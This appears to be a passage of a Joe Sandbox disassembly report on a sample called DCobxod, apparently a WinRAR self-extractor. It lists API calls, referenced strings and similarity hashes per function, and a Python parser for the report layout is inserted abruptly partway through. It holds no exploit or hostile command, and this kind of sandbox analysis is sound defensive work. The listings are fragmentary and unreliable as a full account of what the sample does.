                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nB
                                                              • API String ID: 3519838083-1801942350
                                                              • Opcode ID: 9223ade153508a06b95d7f528e0de6c5966ef62d55763282afc06cf663288ace
                                                              • Instruction ID: f293f5fd20df806e881d982557f94379e6ca61bc1d7dcd932818eba3c544018a
                                                              • Opcode Fuzzy Hash: 9223ade153508a06b95d7f528e0de6c5966ef62d55763282afc06cf663288ace
                                                              • Instruction Fuzzy Hash: D8719F70A00219AFDF14DFA4CC959AFBBB9FF49715B10016EF412A72A0CB346D42CB54
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00416FAA
                                                              • _wcslen.LIBCMT ref: 00417013
                                                              • _wcslen.LIBCMT ref: 00417084
                                                                • Part of subcall function 00417A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00417AAB
                                                                • Part of subcall function 00417A9C: GetLastError.KERNEL32 ref: 00417AF1
                                                                • Part of subcall function 00417A9C: CloseHandle.KERNEL32(?), ref: 00417B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: 19477b61cdba12af2c5a240c30c3065342af5373d7ef61c4098cbfd84b986289
                                                              • Instruction ID: 3805e7c027e5f264562b258b4d8a29f24c25391dc61fb9b4ad38348b8829c5c3
                                                              • Opcode Fuzzy Hash: 19477b61cdba12af2c5a240c30c3065342af5373d7ef61c4098cbfd84b986289
                                                              • Instruction Fuzzy Hash: A641CAB1D0434479EB20EB719C82FEFB77C9F04748F00445BFA55A6282D67CAAC48769
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042B610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0042B637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0042B650
                                                              • SetWindowTextW.USER32(?,?), ref: 0042B661
                                                              • GetDlgItem.USER32(?,00000065), ref: 0042B66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0042B67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0042B694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: dc5b0bda7bf43c07f5b7f4dfea035eaec30d2b520660e3e14663c47cc510459a
                                                              • Instruction ID: d1debd91b7403aac58386f111450831b4a5554bd9260b57bf1e0f5026f55ce01
                                                              • Opcode Fuzzy Hash: dc5b0bda7bf43c07f5b7f4dfea035eaec30d2b520660e3e14663c47cc510459a
                                                              • Instruction Fuzzy Hash: 2B213731300225BBD2115F66FC4AF3B3B6CFB0AB46F41402AF644E25A0DB5A9941A67F
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,5A73DC7F,00000001,00000000,00000000,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FE1F
                                                              • _com_issue_error.COMSUPP ref: 0042FE48
                                                              • _com_issue_error.COMSUPP ref: 0042FE52
                                                              • GetLastError.KERNEL32(80070057,5A73DC7F,00000001,00000000,00000000,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FE57
                                                              • _com_issue_error.COMSUPP ref: 0042FE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FE80
                                                              • _com_issue_error.COMSUPP ref: 0042FE93
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: 92f001e1eac0acedcee539643282def6eeb2af89fbcbb26f56ae3645bfea6afe
                                                              • Instruction ID: 605268864e73a33559c16802a5edc850e9d2f069104a7d8ab91605f78c86c352
                                                              • Opcode Fuzzy Hash: 92f001e1eac0acedcee539643282def6eeb2af89fbcbb26f56ae3645bfea6afe
                                                              • Instruction Fuzzy Hash: AA411871B00224ABDB109F65E845BAFBBB8EB48B15F90423FF805E7351D778990487A9
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00419387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004193AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004193C9
                                                                • Part of subcall function 0041C29A: _wcslen.LIBCMT ref: 0041C2A2
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              • _swprintf.LIBCMT ref: 00419465
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 004194D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00419514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              • Opcode ID: 4576f4473a50ee170e2ef6b3456737ae1a1e5d294dc1261cf3a80961af3e9f6a
                                                              • Instruction ID: d15d7e826787053e74919245c502bc2b281cbce191fd2181e5dabcf051274173
                                                              • Opcode Fuzzy Hash: 4576f4473a50ee170e2ef6b3456737ae1a1e5d294dc1261cf3a80961af3e9f6a
                                                              • Instruction Fuzzy Hash: 5641937290026476DF21ABA1DD55EDF737DAF45344F0048ABF609A3152EA3C8FC98B68
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: UB$pB$zB
                                                              • API String ID: 176396367-2224578637
                                                              • Opcode ID: 99485401b52263a647973af0a325941614321a3c478c7b808cb6c98ca9fdccb9
                                                              • Instruction ID: 19a45458a792b82d1eb484b032067d2225a2e0ff9439eaeeb2ba85b604a5b917
                                                              • Opcode Fuzzy Hash: 99485401b52263a647973af0a325941614321a3c478c7b808cb6c98ca9fdccb9
                                                              • Instruction Fuzzy Hash: E941B671A006695BCB119F68CC069EF7BB8EF05311F00006EFD45F7256DB38AE858BA9
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00429EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00429F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00429FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00429FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00429FF9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: B$RarHtmlClassName
                                                              • API String ID: 3937224194-998244635
                                                              • Opcode ID: 9b2af4449d39cb94bd47ef48233de839994f88e0200d0c33bbbd3abbe46141e7
                                                              • Instruction ID: 78eaeb5ba42b4ea2556ec1ac782febcfc104612366c118915c5a1721241e57c2
                                                              • Opcode Fuzzy Hash: 9b2af4449d39cb94bd47ef48233de839994f88e0200d0c33bbbd3abbe46141e7
                                                              • Instruction Fuzzy Hash: 0441E331104220EFCB215F65EC48B1B7BA8FF48706F40456AFD4999156CB38DD54DB6E
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 0042122E
                                                                • Part of subcall function 0041B146: GetVersionExW.KERNEL32(?), ref: 0041B16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00421251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00421263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00421274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004212CF
                                                              • __aullrem.LIBCMT ref: 00421379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: ea41c739f2ac4e67bf221c54799f83552b60710f1519aae8f4ce4d277e77f2cf
                                                              • Instruction ID: b7643b326dfca128e1cc592c6e3714db9c4cd1e2893d38a0759f52ba4d045a28
                                                              • Opcode Fuzzy Hash: ea41c739f2ac4e67bf221c54799f83552b60710f1519aae8f4ce4d277e77f2cf
                                                              • Instruction Fuzzy Hash: 1B4168B5508315AFC710DF65D88096BBBF9FF88714F40892EF996C2610E738E609CB66
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00412536
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              • Opcode ID: 13d47e927f5338ff37c07eb247c6890797a038319433802208ac98103fb067dc
                                                              • Instruction ID: 9ddccd6e699431901eabc4af13ee2588fcf9f4a8653d8a960a67efddf219d392
                                                              • Opcode Fuzzy Hash: 13d47e927f5338ff37c07eb247c6890797a038319433802208ac98103fb067dc
                                                              • Instruction Fuzzy Hash: A9F138706042409BCB25EB25CAD5BEE77955B90304F08056FEC86DB383DBAC9DC587AA
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: 5b41d6a9bdc9998025aeacd763f43a3a996147226d0df449cfe81908d3eeda93
                                                              • Instruction ID: 7b482cf3d20cb5f1441dd577330cb7f994639dc48e60f6d15e2925300001dd37
                                                              • Opcode Fuzzy Hash: 5b41d6a9bdc9998025aeacd763f43a3a996147226d0df449cfe81908d3eeda93
                                                              • Instruction Fuzzy Hash: 9751D66675133295DB309A25B8117B773A0DFA1750FEA042BF9818B3C0FB6D8C81926D
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0043FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0043F6CF
                                                              • __fassign.LIBCMT ref: 0043F74A
                                                              • __fassign.LIBCMT ref: 0043F765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0043F78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,0043FE02,00000000,?,?,?,?,?,?,?,?,?,0043FE02,00000000), ref: 0043F7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,0043FE02,00000000,?,?,?,?,?,?,?,?,?,0043FE02,00000000), ref: 0043F7E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: b0ce387c4b58114902f065e82731e68ceeaae6aabb12f21b1ca03c32b818d7ef
                                                              • Instruction ID: 51a40a4bdabc8c1af7cf3aa91ec0eb96bd76c2e5bde02ba668b53b647943e1b9
                                                              • Opcode Fuzzy Hash: b0ce387c4b58114902f065e82731e68ceeaae6aabb12f21b1ca03c32b818d7ef
                                                              • Instruction Fuzzy Hash: 7F51B2B5D00209AFCB14CFA8DC81AEEBBF4EF0D300F14516AE955E7251D774AA45CBA8
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0042CE9D
                                                                • Part of subcall function 0041B690: _wcslen.LIBCMT ref: 0041B696
                                                              • _swprintf.LIBCMT ref: 0042CED1
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • SetDlgItemTextW.USER32(?,00000066,0045946A), ref: 0042CEF1
                                                              • _wcschr.LIBVCRUNTIME ref: 0042CF22
                                                              • EndDialog.USER32(?,00000001), ref: 0042CFFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 689974011-1360425832
                                                              • Opcode ID: aff505bc583da443a19f527541d79fdc8d67631dc1dfa24c1bfe755a7a33d6a0
                                                              • Instruction ID: 98fa930ca1403de31404205fd286bc29081793dfe6e026be5e755a8ce2ac25a1
                                                              • Opcode Fuzzy Hash: aff505bc583da443a19f527541d79fdc8d67631dc1dfa24c1bfe755a7a33d6a0
                                                              • Instruction Fuzzy Hash: 8A416471A00268AADF21DB50DC85BEE77BCEB05345F8080A7F909E7151EA789E44CF69
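The entries on this page follow one fixed layout: an `APIs` list of call sites (`Name.MODULE(args), ref: ADDR`, with `Part of subcall function ADDR:` marking calls made inside a callee), the memory dump the function was lifted from, and a `Similarity` block whose `API String ID` and `Opcode ID` are the values you search for in other reports to find the same function. The parser below is an added example, not Joe Sandbox code; `REPORT_EXCERPT` is abridged from the two entries above and below this point, with one `Associated` line deliberately keeping the `Download File` link text the HTML export leaves behind, so that the parser can be seen stripping it.

```python
"""Parse per-function 'APIs' / 'Similarity' entries of a Joe Sandbox disassembly
report (the layout shown on this page) into records that can be pivoted on.
Added example, not Joe Sandbox code; the excerpt is abridged from this page."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

REPORT_EXCERPT = """\
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 0042CE9D
  • Part of subcall function 0041B690: _wcslen.LIBCMT ref: 0041B696
• _swprintf.LIBCMT ref: 0042CED1
• SetDlgItemTextW.USER32(?,00000066,0045946A), ref: 0042CEF1
• EndDialog.USER32(?,00000001), ref: 0042CFFE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
• Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
• String ID: %s%s%u
• API String ID: 689974011-1360425832
• Opcode ID: aff505bc583da443a19f527541d79fdc8d67631dc1dfa24c1bfe755a7a33d6a0
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0042E669,0042E5CC,0042E86D), ref: 0042E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0042E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0042E630
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: 836358303f2d6d14b0f5dd158502e470ac65d6f4ed247892c9fe264ba39ec6d8
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:" for calls made via a callee.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key: value" metadata lines (API ID, String ID, Opcode ID, Source File, ...)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
LINK_RESIDUE = "Download File"  # link text the HTML export appends to dump names


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address in the dump
    subcall_of: str | None = None  # set when the call sits inside a callee


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)
    dumps: list[str] = field(default_factory=list)  # 'Associated' memory dumps

    @property
    def strings(self) -> list[str]:
        # The report joins a function's referenced strings with '$'.
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_report(text: str) -> list[FunctionEntry]:
    """Split the text at each 'APIs' label and collect one entry per function."""
    entries: list[FunctionEntry] = []
    current: FunctionEntry | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # bare section labels (Strings, Similarity, ...) carry no data
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            value = m["value"].removesuffix(LINK_RESIDUE).strip()
            if m["key"] == "Associated":
                current.dumps.append(value)
            else:
                current.fields[m["key"]] = value
    return entries


def callers_of(entries: list[FunctionEntry], api_name: str) -> list[FunctionEntry]:
    """Functions that call api_name directly or through a listed subcall."""
    return [e for e in entries if any(c.name == api_name for c in e.calls)]


def resolved_imports(entry: FunctionEntry) -> list[str]:
    """Export names this function resolves at runtime via GetProcAddress."""
    return [c.args[1] for c in entry.calls if c.name == "GetProcAddress" and len(c.args) > 1]


if __name__ == "__main__":
    for e in parse_report(REPORT_EXCERPT):
        print(e.fields.get("API String ID"), [c.name for c in e.calls], e.strings, resolved_imports(e))
```

Feed the whole report text to `parse_report` and the records give you the function-level call chains, the strings each function references, and the `API String ID` / `Opcode ID` pairs to search for in other sandbox reports; `resolved_imports` pulls the export names a function looks up dynamically, which is how the `AcquireSRWLockExclusive` / `ReleaseSRWLockExclusive` lookup below surfaces without reading the listing by hand.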
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00432937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0043293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 004329C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004329F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 00432A48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 535933a68a31f37cb438c88139474660aa8a7bc38736e6dbe458ce155981d1f2
                                                              • Instruction ID: 772597e45a54899a2209e3f966bb38e91f1ddff45e09c2e1f110bf6e20b5f0b3
